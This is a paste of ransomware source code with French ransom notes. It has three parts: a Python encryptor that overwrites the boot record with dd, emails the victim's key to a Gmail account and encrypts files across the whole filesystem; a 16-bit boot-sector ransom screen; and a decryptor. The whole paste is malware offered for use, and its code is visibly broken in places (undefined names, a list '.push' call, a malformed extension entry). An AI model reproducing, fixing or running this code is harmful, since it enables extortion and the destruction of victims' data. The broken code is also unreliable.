
Untitled

a guest
Aug 20th, 2018
  1. Ransomware.py
  2. [quode]
  3. import os
  4. import sys
  5. import random
  6. import struct
  7. import smtplib
  8. import string
  9. import datetime
  10. import time
  11.  
  12. import getpass as gp
  13.  
  14. from Crypto.Cipher import AES
  15. from Crypto.PublicKey import RSA
  16. from multiprocessing import Pool
  17.  
  18. # Function to generate our client ID
  19. def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
  20. return ''.join(random.choice(chars) for _ in range(size))
  21.  
  22. ID = gen_client_ID(12)
  23. key = RSA.generate(2048)
  24. exKey = RSA.exportKey('PEM')
  25.  
  26. # Check to see if we're on linux and have root, if so use dd to override the MBR with our bootlocker.
  27. if sys.platform == 'linux2' and gp.getuser() == 'root':
  28. try:
  29. os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
  30. except:
  31. pass
  32. else:
  33. try:
  34. os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
  35. except:
  36. pass
  37.  
  38.  
  39. def send_ID_Key():
  40. ts = datetime.datetime.now()
  41. SERVER = "smtp.gmail.com"
  42. PORT = 587
  43. USER = "address@gmail.com" # Specify Username Here
  44. PASS = "prettyflypassword" # Specify Password Here
  45. FROM = USER
  46. TO = ["address@gmail.com"]
  47. SUBJECT = "Ransomware data: "+str(ts)
  48. MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
  49. message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
  50. try:
  51. server = smtplib.SMTP()
  52. server.connect(SERVER, PORT)
  53. server.starttls()
  54. server.login(USER, PASS)
  55. server.sendmail(FROM, TO, message)
  56. server.quit()
  57. except Exception as e:
  58. # print e
  59. pass
  60.  
  61.  
  62. def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
  63.  
  64. if not out_filename:
  65. out_filename = in_filename + '.crypt'
  66.  
  67. iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
  68. encryptor = AES.new(key, AES.MODE_CBC, iv)
  69. filesize = os.path.getsize(in_filename)
  70.  
  71. with open(in_filename, 'rb') as infile:
  72. with open(out_filename, 'wb') as outfile:
  73. outfile.write(struct.pack('<Q', filesize))
  74. outfile.write(iv)
  75.  
  76. while True:
  77. chunk = infile.read(chunksize)
  78. if len(chunk) == 0:
  79. break
  80. elif len(chunk) % 16 != 0:
  81. chunk += ' ' * (16 - len(chunk) % 16)
  82.  
  83. outfile.write(encryptor.encrypt(chunk))
  84.  
  85.  
  86.  
  87. def single_arg_encrypt_file(in_filename):
  88. encrypt_file(key, in_filename)
  89.  
  90. def select_files():
  91.  
  92. ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
  93. ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
  94. ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
  95. ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
  96. ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
  97. ".mov", ".gif", ".txt", ".py", ".pyc", ".jar",".gif",
  98. ".groups", ".hdd", ".hpp", ".log", ".m2ts", ".m4p", ".mkv",
  99. ".mpeg", ".ndf", ".nvram", ".ogg", ".ost", ".pab", ".pdb", ".pif",
  100. ".png", ".qed", ".qcow", ".qcow2", ".rvt", ".st7", ".stm", ".vbox",
  101. ".vdi", ".vhd", ".vhdx", ".vmdk", ".vmsd", ".vmx", ".vmxf", ".3fr",
  102. ".3pr", ".ab4", ".accde", ".accdr", ".accdt", ".ach", ".acr", ".adb",
  103. ".ads", ".agdl", ".ait", ".apj", ".asm", ".awg", ".back", ".backup",
  104. ".backupdb", ".bay", ".bdb", ".bgt", ".bik", ".bpw", ".cdr3", ".cdr4",
  105. ".cdr5", ".cdr6", ".cdrw", ".ce1", ".ce2", ".cib", ".craw", ".crw",
  106. ".csh", ".csl", ".db_journal", ".dc2", ".dcs", ".ddoc", ".ddrw",
  107. ".der", ".des", ".dgc", ".djvu", ".dng", ".drf", ".dxg", ".eml",
  108. ".erbsql", ".erf", ".exf", ".ffd", ".fh", ".fhd", ".gray", ".grey",
  109. ".gry", ".hbk", ".ibd", ".ibz", ".iiq", ".incpas", ".jpe",
  110. ".kc2", ".kdbx", ".kdc", ".kpdx", ".lua", ".mdc", ".mef", ".mfw",
  111. ".mmw", ".mny", ".mrw", ".myd", ".ndd", ".nef", ".nk2", ".nop",
  112. ".nrw", ".ns2", ".ns3", ".ns4", ".nwb", ".nx2", ".nxl", ".nyf",
  113. ".odb", ".odf", ".odg", ".odm", ".orf", ".otg", ".oth", ".otp",
  114. ".ots", ".ott", ".p12", ".p7b", ".p7c", ".pdd", ".pem",
  115. ".plus_muhd", ".plc", ".pot", ".pptx", ".psafe3", ".py",
  116. ".qba", ".qbr", ".qbw", ".qbx", ".qby", ".raf", ".rat",
  117. ".raw", ".rdb", ".rwl", ".rwz", ".s3db", ".sd0", ".sda",
  118. ".sdf", ".sqlite", ".sqlite3", ".sqlitedb", ".sr2", ".srf",
  119. ".srw", ".st5", ".st8", ".std", ".sti", ".stw", ".stx", ".sxd",
  120. ".sxg", ".sxi", ".sxm", ".tex", ".wallet", ".wb2", ".wpd",
  121. ".x11", ".x3f", ".xis", ".ycbcra", ".yuv", ".contact", ".dbx",
  122. ".doc", ."docx", ".jnt", ".msg", ".oab",".ods", ".pdf", ".pps",
  123. ".ppsm", ".ppt", ".pptm", ".prf", ".pst", ".rar", ".rtf", ".txt",
  124. ".wab", ".xls", ".xlsx", ".xml", ".zip", ".1cd", ".7zip", ".accdb",
  125. ".aoi", ".asf", ".asp", ".aspx", ".asx", ".bak", ".cer", ".cfg",
  126. ".class", ".config", ".css", ".csv", ".db", ".dds", ".dwg", ".dxf",
  127. ".flf", ".flv", ".html", ".idx", ".js", ".key", ".kwm", ".laccdb",
  128. ".ldf", ".lit", ".m3u", ".mbx", ".md", ".mdf", ".mid", ".mlb",
  129. ".obj", ".odt", ".pages", ".php", ".psd", ".pwm", ".rm", ".safe",
  130. ".sav", ".save", ".sql", ".srt", ".swf", ".thm", ".vob", ".wav",
  131. ".wma", ".wmv", ".xlsb", ".3dm", ".aac", ".ai", ".arw", ".cdr",
  132. ".cls", ".cpi", ".cpp", ".cs", ".db3", ".docm", ".dot", ".dotm",
  133. ".dotx", ".drw", ".dxb", ".eps", ".fla", ".flac", ".fxg",
  134. ".java", ".m", ".m4v", ".max", ".mdb", ".pcd", ".pct", ".pl",
  135. ".potm", ".potx", ".ppam", ".ppsm", ".ppsx", ".pptm", ".ps",
  136. ".r3d", ".rw2", ".sldm", ".sldx", ".svg", ".tga", ".wps",
  137. ".xla", ".xlam", ".xlm", ".xlr", ".xlsm", ".xlt", ".xltm",
  138. ".xltx", ".xlw", ".act", ".adp", ".al", ".bkp", ".blend",
  139. ".cdf", ".cdx", ".cgm", ".cr2", ".crt", ".dac", ".dbf",
  140. ".dcr", ".ddd", ".design", ".dtd", ".fdb", ".fff", ".fpx",
  141. ".h", ".iif", ".indd", ".mos", ".nd", ".nsd", ".nsf",
  142. ".nsg", ".nsh", ".odc", ".odp", ".oil", ".pas", ".pat",
  143. ".pef", ".pfx", ".ptx", ".qbb", ".qbm", ".sas7bdat", ".say",
  144. ".st4", ".st6", ".stc", ".sxc", ".sxw", ".tlg", ".wad",
  145. ".xlk", ".aiff", ".bin", ".bmp", ".cmt", ".dat", ".dit",
  146. ".edb", ".flvv"]
  147.  
  148. files_to_enc = []
  149. for root, dirs, files in os.walk("/"):
  150. for file in files:
  151. if file.endswith(tuple(ext)):
  152. files_to_enc.push(os.path.join(root, file))
  153.  
  154. # Parallelize execution of encryption function over four subprocesses
  155. pool = Pool(processes=4)
  156. pool.map(single_arg_encrypt_file, files_to_enc)
  157.  
  158.  
  159. def note():
  160.  
  161. readme = """
  162.  
  163. ._______ .______ ._______ .__ __. ______ .__ __
  164. | ____|| _ \ | ____|| \ | | / || | | |
  165. | |__ | |_) | | |__ | \| | | ,----'| |__| |
  166. | __| | / | __| | . ` | | | | __ |
  167. | | | |\ \----.| |____ | |\ | | `----.| | | |
  168. |__| | _| `._____||_______||__| \__| \______||__| |__|
  169.  
  170. ._______ ._______ ._______ .______ .___ __ ____ ._______ .______
  171. | \ | ____|| ____|| _ \ \ \ / \ / / | ____|| _ \
  172. | .--. || |__ | |__ | |_) | \ \/ \/ / | |__ | |_) |
  173. | | | || __| | __| | ___/ _ \ / | __| | _ <
  174. | '--' || |____ | |____ | | |_| \ /\ / | |____ | |_) |
  175. |_______/ |_______||_______|| _| \__/ \__/ |_______||______/
  176.  
  177. Bonjour,
  178.  
  179. Malheureusement, tous vos fichiers ont été chiffrés avec un cryptage de grade militaire
  180. il vous sera donc impossible de les récupérer sans acquerir la clé de chiffrement.
  181.  
  182. Envoyer 0,5 Bitcoin a "ADRESSE BITCON ICI"
  183.  
  184. une fois votre versement éffectuer envoyer nous un email a "ransomware@yopmail.fr"
  185. avec le numero de la transaction Bitcoin ainsi que votre address email et nous vous enverons
  186. la clé de chiffrement au plus vite.
  187.  
  188. Nous vous remercions de votre patience.
  189.  
  190. Bonne journée,
  191. Le French Deep Web.
  192.  
  193. """
  194.  
  195. # Windows variant
  196. # outdir = os.getenv('USERNAME') + "\\Desktop"
  197.  
  198. outdir = os.getenv('HOME') + "/Desktop/"
  199. outfile = outdir + "README"
  200.  
  201. handler = open(outputfile, 'w')
  202. handler.write(outfile, ID)
  203. handler.close()
  204.  
  205. if __name__=="__main__":
  206. gen_client_ID()
  207. send_ID_Key()
  208.  
  209. try:
  210. select_files()
  211. note()
  212. except Exception as e:
  213. pass
  214.  
  215. [/quode]
  216.  
  217. bootlocker.asm
  218. [quode][BITS 16]
  219. [ORG 0x7C00]
  220. MOV SI, Msg
  221. CALL OutStr
  222. JMP $
  223. OutChar:
  224. MOV AH, 0x0E
  225. MOV BH, 0x00
  226. MOV BL, 0x07
  227. INT 0x10
  228. RET
  229. OutStr:
  230. next_char:
  231. MOV AL, [SI]
  232. INC SI
  233. OR AL, AL
  234. JZ exit_function
  235. CALL OutChar
  236. JMP next_char
  237. exit_function:
  238. RET
  239. Msg db 0xA, 0xD, 0xA, 0xD
  240. db '################################################################################################', 0xA, 0xD
  241. db '# #', 0xA, 0xD
  242. db '# Tous vos fichiers ont été chiffrés avec un cryptage de grade militaire #', 0xA, 0xD
  243. db '# Il vous sera donc impossible de les récupérer sans acquerir la clé de chiffrement. #', 0xA, 0xD
  244. db '# #', 0xA, 0xD
  245. db '# Envoyer 0,5 Bitcoin a "ADRESSE BITCON ICI" #', 0xA, 0xD
  246. db '# #', 0xA, 0xD
  247. db '# une fois votre versement éffectuer envoyer nous un email a "ransomware@yopmail.fr" #', 0xA, 0xD
  248. db '# avec le numero de la transaction Bitcoin ainsi que votre address email #', 0xA, 0xD
  249. db '# et nous vous enverons #', 0xA, 0xD
  250. db '# la clé de cryptage ainsi que la méthode pour déchiffrer vos fichiers au plus vite. #', 0xA, 0xD
  251. db '# #', 0xA, 0xD
  252. db '# Nous vous remercions de votre patience. #', 0xA, 0xD
  253. db '# #', 0xA, 0xD
  254. db '################################################################################################', 0xA, 0xD
  255. db ' ', 0xA, 0xD
  256. db '################################################################################################', 0xA, 0xD
  257. db '# #', 0xA, 0xD
  258. db '# Malheureusement, il ne vous reste que 7 jours avant que la clé de cryptage ne soit détruite.#', 0xA, 0xD
  259. db '# Bonne Journée, #', 0xA, 0xD
  260. db '# Le French Deep Web #', 0xA, 0xD
  261. db '# #', 0xA, 0xD
  262. db '################################################################################################', 0
  263. TIMES 510 - ($ - $$) db 0
  264. DW 0xAA55
  265. [/quode]
  266.  
  267.  
  268. Décryption.py
  269. [quode]
  270. import os
  271. import sys
  272. import struct
  273.  
  274. from base64 import b64decode
  275. from Crypto.Cipher import AES
  276. from Crypto.PublicKey import RSA
  277. from multiprocessing import Pool
  278.  
  279. # Read in and decode keyfile
  280. with open('privkey', 'r') as keyfile:
  281. keyData = keyfile.read().replace('\n', '')
  282.  
  283. keyDER = b64decode(keyData)
  284. key = RSA.importKey(keyDER)
  285.  
  286. def decrypt_file(key, in_filename, out_filename=None, chunksize=24*1024):
  287.  
  288. # Split .crypt extension to restore file format
  289. if not out_filename:
  290. out_filename = os.path.splitext(in_filename)[0]
  291.  
  292. with open(in_filename, 'rb') as infile:
  293. origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
  294. iv = infile.read(16)
  295. decryptor = AES.new(key, AES.MODE_CBC, iv)
  296.  
  297. with open(out_filename, 'wb') as outfile:
  298. while True:
  299. chunk = infile.read(chunksize)
  300. if len(chunk) == 0:
  301. break
  302. outfile.write(decryptor.decrypt(chunk))
  303.  
  304. # Truncate file to original size
  305. outfile.truncate(origsize)
  306.  
  307. def single_arg_decrypt_file(in_filename):
  308. decrypt_file(key, in_filename)
  309.  
  310. def select_files():
  311. # Files to be decrypted are identified by .crypt extension
  312. ext = ".crypt"
  313.  
  314. files_to_dec = []
  315. for root, dirs, files in os.walk("/"):
  316. for file in files:
  317. if file.endswith(str(ext)):
  318. files_to_dec.push(os.path.join(root, file))
  319.  
  320. # Parralelize execution of decrypting function over four sub processes
  321. pool = Pool(processes=4)
  322. pool.map(single_arg_decrypt_file, files_to_dec)
  323.  
  324. if __name__=="__main__":
  325. select_files()
  326. [/quode]